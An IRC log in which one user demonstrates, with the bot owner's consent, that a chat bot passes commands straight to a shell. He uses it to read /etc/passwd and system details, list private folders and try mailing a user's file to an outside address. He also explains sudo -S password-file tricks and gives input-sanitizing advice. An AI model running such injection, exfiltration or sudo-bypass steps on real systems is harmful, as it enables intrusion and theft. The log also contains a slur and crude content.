#test | Logs for 2019-03-26

« return
[05:04:17] -!- fyngyrz_ [fyngyrz_!~fyngyrz@66.171.jo.vll] has joined #test
[05:04:17] -!- mode/#test [+v fyngyrz_] by Artemis
[05:04:17] -!- fungus has quit [Read error: Connection reset by peer]
[05:04:17] -!- fyngyrz has quit [Read error: Connection reset by peer]
[05:04:55] -!- fungus [fungus!~ben@66.171.jo.vll] has joined #test
[05:04:55] -!- mode/#test [+v fungus] by Artemis
[06:40:01] -!- fyngyrz [fyngyrz!~fyngyrz@Soylent/Staff/Editor/fyngyrz] has joined #test
[06:40:01] -!- mode/#test [+v fyngyrz] by Artemis
[06:40:01] -!- fungus has quit [Read error: Connection reset by peer]
[06:40:01] -!- fyngyrz_ has quit [Write error: Connection reset by peer]
[06:41:04] -!- fungus [fungus!~ben@66.171.jo.vll] has joined #test
[06:41:04] -!- mode/#test [+v fungus] by Artemis
[06:54:30] -!- fungus has quit [Remote host closed the connection]
[06:55:09] -!- fungus [fungus!~ben@66.171.jo.vll] has joined #test
[06:55:09] -!- mode/#test [+v fungus] by Artemis
[07:21:20] -!- fungus has quit [Remote host closed the connection]
[07:21:58] -!- fungus [fungus!~ben@66.171.jo.vll] has joined #test
[07:21:58] -!- mode/#test [+v fungus] by Artemis
[07:33:15] <chromas> =[]
[07:33:16] <upstart> /usr/bin/python2: can't open file '/home/2b/Documents/Hacking/D/bot/aa_macro/systemd_macrod.py': [Errno 2] No such file or directory
[07:33:28] <chromas> oh I gotta copy all the things
[07:40:30] -!- upstart has quit [Remote host closed the connection]
[07:41:30] -!- upstart [upstart!~systemd@0::1] has joined #test
[07:41:30] -!- mode/#test [+v upstart] by Artemis
[07:41:40] <chromas> =[]
[07:41:41] <upstart> (Unknown Built-in or Squiggly: tag="" data="")
[07:41:49] <chromas> yeah, boyeee
[07:41:59] <chromas> no security whatsoever on that nig
[07:42:37] <chromas> =[n]
[07:42:38] <upstart> (Unknown Built-in or Squiggly: tag="n" data="")
[07:42:41] <chromas> =[newline]
[07:42:41] <upstart> (Unknown Built-in or Squiggly: tag="newline" data="")
[07:42:52] * chromas will probably read the docs later
[07:43:34] <chromas> =[b]
[07:43:34] <upstart> 
[07:43:48] <chromas> =[cite]
[07:43:48] <upstart> (Unknown Built-in or Squiggly: tag="cite" data="")
[07:49:20] <chromas> =nick SecurityHoleBot
[07:49:20] upstart is now known as SecurityHoleBot
[07:50:04] <Artemis> import crutchy
[11:36:35] -!- exec [exec!~exec@23.24.kp.ip] has joined #test
[11:36:35] -!- mode/#test [+v exec] by Artemis
[11:36:35] -!- exec has quit [Changing host]
[11:36:35] -!- exec [exec!~exec@crutchys.brothel] has joined #test
[11:36:35] -!- mode/#test [+v exec] by irc.sylnt.us
[21:50:07] <fyngyrz> [style foo HELLO] ... {ls}foo{rs}
[21:50:07] <fungus> [style foo HELLO] ... {foo}
[21:50:44] <fyngyrz> you see?
[21:51:47] <chromas> ={test}
[21:51:47] <fungus> =? Unknown Style "test" ?
[21:51:48] <SecurityHoleBot> ? Unknown Style "test" ?
[21:51:53] <fyngyrz> ={cite}
[21:51:53] <fungus> =? Unknown Style "cite" ?
[21:51:53] <SecurityHoleBot> ? Unknown Style "cite" ?
[21:51:55] <chromas> =[style test TESTE] {test}
[21:51:56] <fungus> =[style test TESTE] ? Unknown Style "test" ?
[21:51:56] <SecurityHoleBot> TESTE
[21:51:56] <SecurityHoleBot> ? Unknown Style "test" ?
[21:52:13] <chromas> neat
[21:52:50] <chromas> Now haxx my server
[21:53:05] <fyngyrz> generally, you want the [] defs fed to the code from a file, then the line from the chat fed in and the results then echoed
[21:53:38] <fyngyrz> where the line from the chat has the [] chars made into other during processing, and back before echoing
[21:54:14] <fyngyrz> this separates the ability to define things and use the languages base functions in any way but those you specifically define
[21:54:31] <chromas> So I need to add a =aactl command to add and edit a macro file
[21:54:41] <fyngyrz> I haxx nothing. I consider it boorish at best
[21:56:40] <chromas> =[pythparse print "Hi"]
[21:57:23] <chromas> =[pythparse print "Hi"] [v loc_pyth]
[21:57:24] <SecurityHoleBot> print "Hi"
[21:59:25] <chromas> =[pythparse print open('/etc/passwd', 'rb').read] [v loc_pyth]
[21:59:26] <SecurityHoleBot> print open('/etc/passwd', 'rb' fh = open('filename')
[22:00:58] <fyngyrz> text = fh.read()
[22:01:04] <fyngyrz> fh.close()
[22:01:14] <chromas> can' just open(filename)
[22:01:16] <chromas> derp
[22:01:23] <chromas> can' just open('filename').read()?
[22:01:37] <chromas> =[pythparse print open('/etc/passwd', 'rb').read()] [v loc_pyth]
[22:01:37] <SecurityHoleBot> print open('/etc/passwd', 'rb' might work
[22:02:08] <fyngyrz> there's also a with operation that cvloses for you
[22:02:23] <fyngyrz> I dont' use it much, so can't show off top of head
[22:02:32] <chromas> I just need it to be able to run from one line and python doesn't have semicolons
[22:02:35] <fyngyrz> but it's something like:
[22:02:45] <fyngyrz> with open('filename')
[22:03:06] <fyngyrz> text = read()
[22:03:09] <fyngyrz> or something like that
[22:03:22] <fyngyrz> oh
[22:03:25] <fyngyrz> hang on
[22:03:35] <fyngyrz> it does have multi stataement per line
[22:03:38] <fyngyrz> somewhat
[22:05:46] <fyngyrz> you can use semicolons, but not if you need indents
[22:06:00] <chromas> =[pythparse print(open('/etc/passwd', 'rb').read())] [v loc_pyth]
[22:06:01] <SecurityHoleBot> print(open('/etc/passwd', 'rb' =[pythparse z=open('/etc/passwd', 'rb');print(z.read())] [v loc_pyth]
[22:06:23] <SecurityHoleBot> z=open('/etc/passwd', 'rb' fyi, I'm just getting the HTML code here
[22:06:39] <fyngyrz> my client doesn't parse HTML
[22:07:25] <chromas> it's just html-formatting the string, with syntax highlighting I guess
[22:07:40] <chromas> oh
[22:07:46] <fyngyrz> right
[22:07:49] <chromas> if I actually read the page, I'd see that's what that function does
[22:07:54] <fyngyrz> lol
[22:10:30] <fyngyrz> you may be looking for this:
[22:10:31] <fyngyrz> http://ourtimelines.com
[22:10:32] <SecurityHoleBot> ^ 03[sys]
[22:10:51] <chromas> =[caps CaPs]
[22:10:51] <SecurityHoleBot> Caps
[22:10:54] <chromas> =[titlecaps CaPs]
[22:10:55] <SecurityHoleBot> (Unknown Built-in or Squiggly: tag="titlecaps" data="CaPs")
[22:11:13] <chromas> =[capt CaPs]
[22:11:13] <SecurityHoleBot> Caps
[22:11:21] <fyngyrz> there you go
[22:11:21] <chromas> =[capt title CaPs]
[22:11:21] <SecurityHoleBot> Title Caps
[22:11:23] <chromas> noice
[22:12:00] <chromas> =[capt but does it detect words of preposition?]
[22:12:00] <SecurityHoleBot> But Does It Detect Words of Preposition?
[22:12:02] <fyngyrz> =[sys date]
[22:12:02] <SecurityHoleBot> Tue Mar 26 15:12:02 PDT 2019
[22:12:04] <chromas> double-noice
[22:12:08] <fyngyrz> oh man
[22:12:13] <fyngyrz> you are nekkid
[22:14:02] <chromas> very. it just pipes everything after = into python
[22:14:19] <chromas> (as long as = is follwed by { or [)
[22:14:19] <fungus> 07{braced elements} must balance
[22:14:36] <fyngyrz> reminds me of MDC putting his SSN in his sig
[22:15:14] <chromas> To be fair, there's no reason the primary key of a database should be sooper secret
[22:16:49] <fyngyrz> I strongly advise against this
[22:16:58] <fyngyrz> your call, of course, but... man
[22:20:59] <chromas> The risk makes it fun
[22:22:25] <fyngyrz> it's the same kind of rick you take when you go bungee jumping while leaving a pair of garden shears by the bungee attachment with a "cut the rope" note scotch-taped to them.
[22:22:35] <fyngyrz> rick <- risk
[22:23:38] <fyngyrz> your earlier thing could be:
[22:24:26] <fyngyrz> [sys echo /etc/passwd]
[22:24:34] <fyngyrz> ...assuming permissions are there
[22:24:51] <fyngyrz> you could always run your bot as root. :)
[22:25:52] <fyngyrz> and then
[22:26:00] <fyngyrz> [sys more passwd]
[22:26:04] <fyngyrz> or
[22:26:10] <fyngyrz> [sys less passwd]
[22:26:16] <fyngyrz> etc
[22:27:08] <chromas> ah good point
[22:27:15] <chromas> =[sys echo /etc/passwd]
[22:27:15] <SecurityHoleBot> /etc/passwd
[22:27:21] <chromas> :(
[22:27:28] <fyngyrz> that's echo
[22:27:34] <fyngyrz> use more
[22:27:37] <chromas> herp
[22:27:43] <chromas> =[sys less /etc/passwd]
[22:27:44] <SecurityHoleBot> root:x:0:0::/root:/bin/bash
[22:27:44] <SecurityHoleBot> bin:x:1:1::/:/sbin/nologin
[22:27:44] <SecurityHoleBot> daemon:x:2:2::/:/sbin/nologin
[22:27:44] <SecurityHoleBot> mail:x:8:12::/var/spool/mail:/sbin/nologin
[22:27:44] <SecurityHoleBot> ftp:x:14:11::/srv/ftp:/sbin/nologin
[22:27:45] <SecurityHoleBot> http:x:33:33::/srv/http:/sbin/nologin
[22:27:45] <SecurityHoleBot> nobody:x:65534:65534:Nobody:/:/sbin/nologin
[22:27:45] -!- SecurityHoleBot has quit [Excess Flood]
[22:27:49] <chromas> lel
[22:27:58] -!- upstart [upstart!~systemd@0::1] has joined #test
[22:27:58] -!- mode/#test [+v upstart] by Artemis
[22:30:19] <fyngyrz> perhaps I should write an example bit of Python to show how to secure the lower level? Would that be useful to you?
[22:30:56] <chromas> Well there's nothing useful in /etc/passwd
[22:31:08] <fyngyrz> no, but every system command you have is open this way
[22:31:17] <chromas> it'd be more fun if you made my bot do naughty things :D
[22:31:19] <fyngyrz> whatever the user can use, can be used
[22:31:35] <fyngyrz> I'll leave that to you
[22:31:53] <fyngyrz> that's how to get at anything the cmd line can do. So... use your imagination
[22:32:11] <fyngyrz> =[sys ls]
[22:32:11] <upstart> 2
[22:32:12] <upstart> backups
[22:32:12] <upstart> bin
[22:32:12] <upstart> botstore.dump
[22:32:12] <upstart> build
[22:32:12] <upstart> Desktop
[22:32:12] <upstart> Documents
[22:32:12] <upstart> Downloads
[22:32:13] <upstart> links
[22:32:13] <upstart> Music
[22:32:15] <upstart> notes
[22:32:15] <upstart> openfire.dump
[22:32:15] <upstart> Pictures
[22:32:15] <upstart> Public
[22:32:16] <upstart> startmyxup
[22:32:16] <upstart> Templates
[22:32:18] <upstart> Videos
[22:32:31] <fyngyrz> =[sys ls /home]
[22:32:31] <upstart> 2b
[22:32:31] <upstart> d
[22:32:43] <fyngyrz> you see?
[22:32:52] <fyngyrz> =[sys ls /]
[22:32:53] <upstart> bin
[22:32:53] <upstart> boot
[22:32:53] <upstart> dev
[22:32:53] <upstart> etc
[22:32:53] <upstart> home
[22:32:54] <upstart> lib
[22:32:54] <upstart> lib64
[22:32:55] <upstart> lost+found
[22:32:55] <upstart> mnt
[22:32:55] <upstart> opt
[22:32:56] <upstart> proc
[22:32:56] <upstart> root
[22:32:57] <upstart> run
[22:32:57] <upstart> sbin
[22:32:57] <upstart> srv
[22:32:58] <upstart> sys
[22:32:58] <upstart> tmp
[22:33:00] <upstart> usr
[22:33:00] <upstart> var
[22:33:45] <fyngyrz> [sys less /proc/cpuinfo]
[22:33:50] <fyngyrz> =[sys less /proc/cpuinfo]
[22:33:51] <upstart> processor : 0
[22:33:51] <upstart> vendor_id : AuthenticAMD
[22:33:51] <upstart> cpu family : 20
[22:33:51] <upstart> model : 1
[22:33:51] <upstart> model name : AMD E-350 Processor
[22:33:51] <upstart> stepping : 0
[22:33:51] <upstart> microcode : 0x5000029
[22:33:52] -!- upstart has quit [Excess Flood]
[22:34:07] <fyngyrz> now one knows where to look for CPU vulns, etc
[22:34:48] <fyngyrz> =[sys uname -r]
[22:35:17] <fyngyrz> =[sys echo test]
[22:35:22] <fyngyrz> bot down I guess
[22:35:40] <fyngyrz> but anyway
[22:35:56] <fyngyrz> that's the general way to get a foot in the door. Learn about the target, then attack it
[22:39:07] <fyngyrz> =[sys cat /etc/os-release]
[22:39:09] <fyngyrz> :)
[22:39:14] <chromas> I'm surprised it didn't excess flood again
[22:39:23] <chromas> oh I have to read the whole backlog
[22:39:28] <chromas> well it took longer than it should've
[22:39:30] -!- upstart [upstart!~systemd@0::1] has joined #test
[22:39:30] -!- mode/#test [+v upstart] by Artemis
[22:39:35] <fyngyrz> =[sys cat /etc/os-release]
[22:39:35] <upstart> NAME="Arch Linux"
[22:39:35] <upstart> PRETTY_NAME="Arch Linux"
[22:39:35] <upstart> ID=arch
[22:39:35] <upstart> BUILD_ID=rolling
[22:39:35] <upstart> ANSI_COLOR="0;36"
[22:39:35] <upstart> HOME_URL="https://www.archlinux.org/"
[22:39:36] <upstart> DOCUMENTATION_URL="https://wiki.archlinux.org/"
[22:39:37] <upstart> SUPPORT_URL="https://bbs.archlinux.org/"
[22:39:37] <upstart> BUG_REPORT_URL="https://bugs.archlinux.org/"
[22:40:02] * chromas goes back to the kitchen
[22:40:06] <fyngyrz> =[sys uname -r]
[22:40:06] <upstart> 4.20.13-arch1-1-ARCH
[22:40:43] <fyngyrz> were I a black hat, these would be the first things I'd be looking into
[22:40:54] <fyngyrz> hence the need to triage the input
[22:41:01] <fyngyrz> when exposed to the public
[22:42:05] <fyngyrz> in the python code, you can very simply do this:
[22:42:31] <fyngyrz> mycmds="[style foo BUBBA]"
[22:42:45] <fyngyrz> ...sec
[22:43:14] <fyngyrz> mod = macro()
[22:43:52] <fyngyrz> mod.do(mycmds)
[22:44:18] <fyngyrz> output = mod.do(userinput)
[22:44:21] <fyngyrz> then fwd output
[22:44:35] <fyngyrz> after stripping [ and ] from userinput
[22:44:58] <chromas> wat 4.20?
[22:45:06] <chromas> Guess I need to reboot to get the new kernel
[22:45:18] <fyngyrz> then just {ls}foo{rs} foo will get you BUBBA, and [sys whatever] will get you nothing
[22:45:18] <fungus> then just {foo} foo will get you BUBBA, and [sys whatever] will get you nothing
[22:45:36] <chromas> hm
[22:45:36] <fyngyrz> okay, have fun
[22:45:40] <chromas> =[sys reboot]
[22:46:00] <chromas> the hdd did stuff
[22:46:00] <fyngyrz> =[sys echo test]
[22:46:00] <upstart> test
[22:46:02] <chromas> box is still there
[22:46:13] <fyngyrz> I think it's probably waiting for you to tell it ok
[22:46:14] <chromas> maybe it needs sudo?
[22:46:36] <fyngyrz> yeah, and then you have to use the option that tells sudo to grab the root pwd from a file
[22:46:43] <fyngyrz> it can be done, certainly
[22:47:06] <fyngyrz> ya pipe a test pwd to tmp, then tell sudo to look there
[22:47:11] <fyngyrz> get it right, the whole system is wide open
[22:50:48] <chromas> I just need to restart the bot locally and then it probably doesn't need sudo. Not sure where that rule is defined
[22:51:04] <chromas> remote sessions need a sudo
[22:54:25] <fyngyrz> well, sudo -S is a pretty open door, as you probably know
[22:54:55] <fyngyrz> for instance
[22:55:08] <fyngyrz> sudo -S apt-get update <~/passwd.txt
[22:55:33] <fyngyrz> so... generate passwd.txt to tmp, then:
[22:55:43] <fyngyrz> sudo -S apt-get update </tmp/passwd.txt
[22:56:20] <fyngyrz> that line is only has hard to cross as your password is unlikely
[22:56:32] <chromas> =[sys echo "hunter2">/tmp/MyPassword.txt.exe]
[22:56:45] <chromas> =[sys sudo -S apt-get update </tmp/MyPassword.txt.exe]
[22:56:56] <chromas> :(
[22:57:10] <fyngyrz> cmd won't come back till it finishes
[22:57:17] <chromas> Should throw an error about lack of apt
[22:57:28] <fyngyrz> probably did - I don't think I report stderr
[22:57:31] <fyngyrz> might, tho
[22:57:36] <chromas> aw
[22:57:43] <fyngyrz> test it...
[22:57:45] <fyngyrz> first
[22:57:58] <fyngyrz> =[sys less /etc/passwd]
[22:57:59] <upstart> root:x:0:0::/root:/bin/bash
[22:57:59] <upstart> bin:x:1:1::/:/sbin/nologin
[22:57:59] <upstart> daemon:x:2:2::/:/sbin/nologin
[22:57:59] <upstart> mail:x:8:12::/var/spool/mail:/sbin/nologin
[22:57:59] <upstart> ftp:x:14:11::/srv/ftp:/sbin/nologin
[22:57:59] <upstart> http:x:33:33::/srv/http:/sbin/nologin
[22:58:00] <upstart> nobody:x:65534:65534:Nobody:/:/sbin/nologin
[22:58:00] -!- upstart has quit [Excess Flood]
[22:58:01] <chromas> the bot captures stderr though
[22:58:07] <fyngyrz> ok so far
[22:58:10] -!- upstart [upstart!~systemd@0::1] has joined #test
[22:58:10] -!- mode/#test [+v upstart] by Artemis
[22:58:10] <fyngyrz> =[sys less /etc/passwdfoo]
[22:58:15] <chromas> I just need an output timer
[22:58:18] <fyngyrz> =[sys less /etc/passwdfoo]
[22:58:19] <chromas> common sense floodctl
[22:58:26] <fyngyrz> yeah, no stderr
[22:58:30] <fyngyrz> =[sys less /etc/passwd]
[22:58:30] <upstart> root:x:0:0::/root:/bin/bash
[22:58:30] <upstart> bin:x:1:1::/:/sbin/nologin
[22:58:30] <upstart> daemon:x:2:2::/:/sbin/nologin
[22:58:31] <upstart> mail:x:8:12::/var/spool/mail:/sbin/nologin
[22:58:31] <upstart> ftp:x:14:11::/srv/ftp:/sbin/nologin
[22:58:31] <upstart> http:x:33:33::/srv/http:/sbin/nologin
[22:58:31] <upstart> nobody:x:65534:65534:Nobody:/:/sbin/nologin
[22:58:32] <upstart> dbus:x:81:81:System Message Bus:/:/sbin/nologin
[22:58:32] <upstart> systemd-journal-remote:x:982:982:systemd Journal Remote:/:/sbin/nologin
[22:58:32] -!- upstart has quit [Excess Flood]
[22:58:43] -!- upstart [upstart!~systemd@0::1] has joined #test
[22:58:43] -!- mode/#test [+v upstart] by Artemis
[22:58:52] <fyngyrz> you can time the output return... give it some time between lines
[22:59:07] <chromas> I think the pascal version of the bot did that
[22:59:11] <fyngyrz> prevents floods and allows for longer responses
[23:00:41] <fyngyrz> =[sys sudo -S echo foo </tmp/MyPassword.txt.exe]
[23:01:00] <fyngyrz> doesn't look like it was able to write to tmp, or else the pwd is wrong
[23:02:10] <fyngyrz> =[sys less /tmp/MyPassword.txt.exe]
[23:02:11] <upstart> hunter2
[23:02:16] <fyngyrz> nope, the file got there
[23:02:50] <fyngyrz> so I presume the pwd is wrong
[23:03:40] <fyngyrz> or, your sudo doesn't have -S
[23:03:55] <chromas> =[sys pwd]
[23:03:56] <upstart> /home/2b
[23:04:08] <chromas> =[sys ls Downloads/Pornz/vidya]
[23:04:13] <chromas> :(
[23:04:20] <chromas> [empty directory]
[23:05:49] <fyngyrz> then there's:
[23:06:19] <fyngyrz> sudo -K -A command
[23:06:31] <fyngyrz> if you've prepped a pwd file
[23:08:01] <fyngyrz> helper program
[23:08:08] <fyngyrz> --askpass works too
[23:08:55] <fyngyrz> -k tells it to ignore cached credentials
[23:09:31] <fyngyrz> so together, they let you run sudo without a the secure-ish insistence upon manual pwd input\
[23:10:25] <fyngyrz> you have to set up sudo.conf with the path to the program that returns the password too
[23:10:57] <fyngyrz> so you can hide it pretty well, but once someone sees you use -k -A, they can do it just as easily
[23:11:29] <fyngyrz> and of course, if they can run sudo, the can do anything to you
[23:11:56] <fyngyrz> =[sys ls /]
[23:11:56] <upstart> bin
[23:11:56] <upstart> boot
[23:11:56] <upstart> dev
[23:11:56] <upstart> etc
[23:11:56] <upstart> home
[23:11:57] <upstart> lib
[23:11:57] <upstart> lib64
[23:11:58] <upstart> lost+found
[23:11:58] <upstart> mnt
[23:11:59] <upstart> opt
[23:11:59] <upstart> proc
[23:11:59] <upstart> root
[23:12:00] <upstart> run
[23:12:00] <upstart> sbin
[23:12:00] <upstart> srv
[23:12:01] <upstart> sys
[23:12:02] <upstart> tmp
[23:12:03] <upstart> usr
[23:12:03] <upstart> var
[23:12:11] <fyngyrz> =[sys ls /home]
[23:12:12] <upstart> 2b
[23:12:12] <upstart> d
[23:12:16] <fyngyrz> =[sys ls /home/2b]
[23:12:16] <upstart> 2
[23:12:16] <upstart> backups
[23:12:16] <upstart> bin
[23:12:16] <upstart> botstore.dump
[23:12:16] <upstart> build
[23:12:17] <upstart> Desktop
[23:12:17] <upstart> Documents
[23:12:18] <upstart> Downloads
[23:12:18] <upstart> links
[23:12:19] <upstart> Music
[23:12:19] <upstart> notes
[23:12:20] <upstart> openfire.dump
[23:12:20] <upstart> Pictures
[23:12:20] <upstart> Public
[23:12:21] <upstart> startmyxup
[23:12:21] <upstart> Templates
[23:12:21] <upstart> Videos
[23:12:27] <fyngyrz> =[sys ls /home/2b/Downloads]
[23:12:28] <upstart> blender-benchmark-1.0beta2-linux-glibc219-x86_64.tar.bz2
[23:12:28] <upstart> linux-desktop-wallpaper10.jpg
[23:12:28] <upstart> Musics
[23:12:28] <upstart> Packages
[23:12:28] <upstart> Pornz
[23:12:28] <upstart> VirtualBox VMs
[23:12:40] <fyngyrz> =[sys ls /home/2b/Downloads/Pornz]
[23:12:40] <upstart> girl-mix-03.jpg
[23:12:40] <upstart> nude-in-snow-wallpaper.jpg
[23:12:40] <upstart> snowbunny-jane-larger.jpg
[23:12:40] <upstart> vidya
[23:13:36] <chromas> =[sys ls -F Downloads/Pornz]
[23:13:37] <upstart> girl-mix-03.jpg
[23:13:37] <upstart> nude-in-snow-wallpaper.jpg
[23:13:37] <upstart> snowbunny-jane-larger.jpg
[23:13:37] <upstart> vidya/
[23:14:04] <chromas> =[sys ls --color Downloads/Pornz]
[23:14:05] <upstart> girl-mix-03.jpg
[23:14:05] <upstart> nude-in-snow-wallpaper.jpg
[23:14:05] <upstart> snowbunny-jane-larger.jpg
[23:14:05] <upstart> [01;34mvidya
[23:14:28] <chromas> I need a terminal-to-mirc color adapter
[23:15:33] <fyngyrz> =[sys ls which ftp]
[23:15:40] <fyngyrz> =[sys which ftp]
[23:15:41] <upstart> /usr/bin/ftp
[23:15:49] <fyngyrz> okay, so from there, I can grab your files
[23:16:43] <chromas> =[sys which rm]
[23:16:44] <upstart> /usr/bin/rm
[23:17:09] <chromas> =[sys which which]
[23:17:09] <upstart> /usr/bin/which
[23:17:19] <chromas> =[sys /bin/which which]
[23:17:20] <upstart> /usr/bin/which
[23:24:13] <fyngyrz> =[sys ls -l /home/2b/Downloads/Pornz]
[23:24:13] <upstart> total 1956
[23:24:13] <upstart> -rw-r--r-- 1 2b 2b 750324 Mar 13 19:40 girl-mix-03.jpg
[23:24:14] <upstart> -rw-r--r-- 1 2b 2b 1026299 Feb 26 13:17 nude-in-snow-wallpaper.jpg
[23:24:14] <upstart> -rw-r--r-- 1 2b 2b 145718 Feb 26 15:16 snowbunny-jane-larger.jpg
[23:24:14] <upstart> drwxr-xr-x 2 2b 2b 61440 Mar 1 16:58 vidya
[23:24:21] <fyngyrz> oh yeah. :)
[23:25:22] <chromas> Hm, need to figure out how to get the bot to download more pornz
[23:25:31] <fyngyrz> wget
[23:25:39] <fyngyrz> =[sys which wget]
[23:25:40] <upstart> /usr/bin/wget
[23:25:45] <fyngyrz> you're all set
[23:26:03] <chromas> I need to look at the macro docs so I can have it extract links and call more wgets
[23:26:04] <fyngyrz> =[sys which mutt]
[23:26:26] <chromas> Although wget does have a spider option
[23:26:28] <fyngyrz> =[sys which mailx]
[23:26:28] <upstart> /usr/bin/mailx
[23:26:37] <fyngyrz> ok, there you go. I can email your files to myself
[23:26:50] <fyngyrz> or a temp email account somewhere
[23:27:35] <chromas> ooh
[23:27:46] <chromas> =[sys systemctl reboot]
[23:27:52] <chromas> nope
[23:28:00] <chromas> =[sys systemctl status]
[23:28:01] <upstart> ● cuntspark
[23:28:01] <upstart> State: degraded
[23:28:01] <upstart> Jobs: 0 queued
[23:28:01] <upstart> Failed: 1 units
[23:28:01] <upstart> Since: Sun 2019-03-03 18:08:28 PST; 3 weeks 1 days ago
[23:28:02] <upstart> CGroup: /
[23:28:02] <upstart> ├─user.slice
[23:28:02] -!- upstart has quit [Excess Flood]
[23:28:05] <chromas> heh
[23:28:31] <fyngyrz> =[echo "incoming" | mail -s "Incoming" fyngyrz@gmail.com -A /home/2b/Downloads/Pornz/girl-mix-03.jpg]
[23:28:39] <fyngyrz> =[sys echo "incoming" | mail -s "Incoming" fyngyrz@gmail.com -A /home/2b/Downloads/Pornz/girl-mix-03.jpg]
[23:29:09] <fyngyrz> =[sys which mail]
[23:29:21] <fyngyrz> ah, no mail
[23:29:39] <fyngyrz> interesting that mailx is there
[23:30:48] <fyngyrz> =[sys echo "incoming" | mailx -s "Incoming" -a /home/2b/Downloads/Pornz/girl-mix-03.jpg fyngyrz@gmail.com]
[23:31:40] <fyngyrz> piping might not work, I dunno
[23:32:08] -!- upstart [upstart!~systemd@0::1] has joined #test
[23:32:08] -!- mode/#test [+v upstart] by Artemis
[23:32:15] <fyngyrz> =[sys echo "incoming" | mailx -s "Incoming" -a /home/2b/Downloads/Pornz/girl-mix-03.jpg fyngyrz@gmail.com]
[23:32:16] <upstart> /home/2b/dead.letter 13189/1014225
[23:32:51] <chromas> what does that mean? it failed to send?
[23:32:58] * chromas looks at the file
[23:33:26] <fyngyrz> not sure, in man now
[23:33:58] <fyngyrz> your system might not have a mail capability
[23:34:06] <fyngyrz> in which case ftp would be what to use
[23:34:10] <fyngyrz> since that's there
[23:34:17] <fyngyrz> =[sys which ftp]
[23:34:18] <upstart> /usr/bin/ftp
[23:34:30] <fyngyrz> you have to have somewhere to send it, is all
[23:34:43] <fyngyrz> some pub somewhere
[23:35:19] <chromas> ooh
[23:35:31] <chromas> I opened a vnc session to muh virtual desktop
[23:35:42] <chromas> it's asking for password. must be for the reboot
[23:36:00] <fyngyrz> yes, unless you set up for -k -A, it would have to
[23:36:02] <chromas> weird that it doesn't say what it wants permissions for. thanks, opendesktop
[23:36:07] <fyngyrz> lol yeah
[23:36:12] <fyngyrz> "click here to DIE"
[23:36:24] <fyngyrz> rm -f *
[23:36:25] <chromas> well also it's running from the command line; what's it doing gui stuff for?
[23:36:44] <fyngyrz> probably the default password input program is that one
[23:36:56] <fyngyrz> check the sudo conf file
[23:37:40] <chromas> where's that?
[23:37:46] <chromas> I only have sudoers and sudoers.d
[23:38:15] <fyngyrz> you might have to create it
[23:38:19] <fyngyrz> I think it lives in etc
[23:38:31] <fyngyrz> if it's not there... might be an arch thing?
[23:38:40] <chromas> I think policykit injects imposes itself
[23:38:48] * chromas can't didn't edit
[23:39:38] <fyngyrz> could be
[23:39:42] <fyngyrz> it works here though
[23:40:00] <fyngyrz> this is on a mac
[23:40:09] <fyngyrz> but generally this stuff is pretty universal
[23:40:43] <chromas> then again, linux is a bit nimby
[23:40:45] <chromas> or nih
[23:41:19] -!- upstart has quit [Remote host closed the connection]
[23:42:09] <fyngyrz> =[sys ftp --help]
[23:42:14] -!- upstart [upstart!~systemd@0::1] has joined #test
[23:42:14] -!- mode/#test [+v upstart] by Artemis
[23:42:17] <fyngyrz> ah, no stderr
[23:43:07] upstart is now known as SecurityHoleBot
[23:44:50] <fyngyrz> =[sys ftp --help]
[23:44:51] <SecurityHoleBot> ftp (mail v14.9.13): send and receive Internet mail
[23:44:51] <SecurityHoleBot> Send-only mode: send mail "to-addr"(ess) receiver(s):
[23:44:51] <SecurityHoleBot> ftp [-DdEFinv~#] [-: spec] [-A account] [:-C "field: body":]
[23:44:51] <SecurityHoleBot> [:-a attachment:] [:-b bcc-addr:] [:-c cc-addr:]
[23:44:52] <SecurityHoleBot> [-M type | -m file | -q file | -t] [-r from-addr] [:-S var[=value]:]
[23:44:52] <SecurityHoleBot> [-s subject] [-T "arget: addr"] [:-X/Y cmd:] [-.] :to-addr:
[23:44:52] <SecurityHoleBot> "Receive" mode, starting on [-u user], primary *inbox* or [$MAIL]:
[23:44:53] <SecurityHoleBot> ftp [-DdEeHiNnRv~#] [-: spec] [-A account] [:-C "field: body":]
[23:44:53] <SecurityHoleBot> [-L spec] [-r from-addr] [:-S var[=value]:] [-u user] [:-X/Y cmd:]
[23:44:54] <SecurityHoleBot> "Receive" mode, starting on -f (secondary $MBOX or [file]):
[23:44:55] <SecurityHoleBot> ftp [-DdEeHiNnRv~#] [-: spec] [-A account] [:-C "field: body":] -f
[23:44:55] <SecurityHoleBot> [-L spec] [-r from-addr] [:-S var[=value]:] [:-X/Y cmd:] [file]
[23:44:56] <SecurityHoleBot> . -d sandbox, -:/ no .rc files, -. end options and force send-mode
[23:44:58] <SecurityHoleBot> . -a attachment[=input-charset[#output-charset]]
[23:44:58] <SecurityHoleBot> . -[bcrT], to-addr: ex@am.ple or '(Lovely) Ex <am@p.le>'
[23:44:58] <SecurityHoleBot> . -[Mmqt]: special input data (-t: template message on stdin)
[23:44:58] <SecurityHoleBot> . -e only mail check, -H header summary; both: message specification via -L
[23:45:00] <SecurityHoleBot> . -S (un)sets variable, -X/-Y execute commands pre/post startup, -#: batch mode
[23:45:00] <SecurityHoleBot> . Features via "$ ftp -Xversion -Xx"; there is --long-help
[23:45:00] <SecurityHoleBot> . Bugs/Contact via "$ ftp -Sexpandaddr=shquote '\$contact-mail'"
[23:45:14] <fyngyrz> was just no bot
[23:45:17] <fyngyrz> :)
[23:45:24] <chromas> I added a little timer in
[23:46:05] <fyngyrz> I see that
[23:46:41] <fyngyrz> so here, one could write a file to tmp containing all kinds of ftp commands, then run ftp using that as input
[23:47:48] <fyngyrz> =[sys ls / >/tmp/lsoutput]
[23:47:56] <fyngyrz> =[sys less /tmp/lsoutput]
[23:47:57] <SecurityHoleBot> bin
[23:47:57] <SecurityHoleBot> boot
[23:47:57] <SecurityHoleBot> dev
[23:47:57] <SecurityHoleBot> etc
[23:47:57] <SecurityHoleBot> home
[23:47:57] <SecurityHoleBot> lib
[23:47:58] <SecurityHoleBot> lib64
[23:47:58] <SecurityHoleBot> lost+found
[23:47:58] <SecurityHoleBot> mnt
[23:47:59] <SecurityHoleBot> opt
[23:47:59] <SecurityHoleBot> proc
[23:48:00] <SecurityHoleBot> root
[23:48:01] <SecurityHoleBot> run
[23:48:02] <SecurityHoleBot> sbin
[23:48:02] <SecurityHoleBot> srv
[23:48:03] <SecurityHoleBot> sys
[23:48:03] <SecurityHoleBot> tmp
[23:48:04] <SecurityHoleBot> usr
[23:48:04] <SecurityHoleBot> var
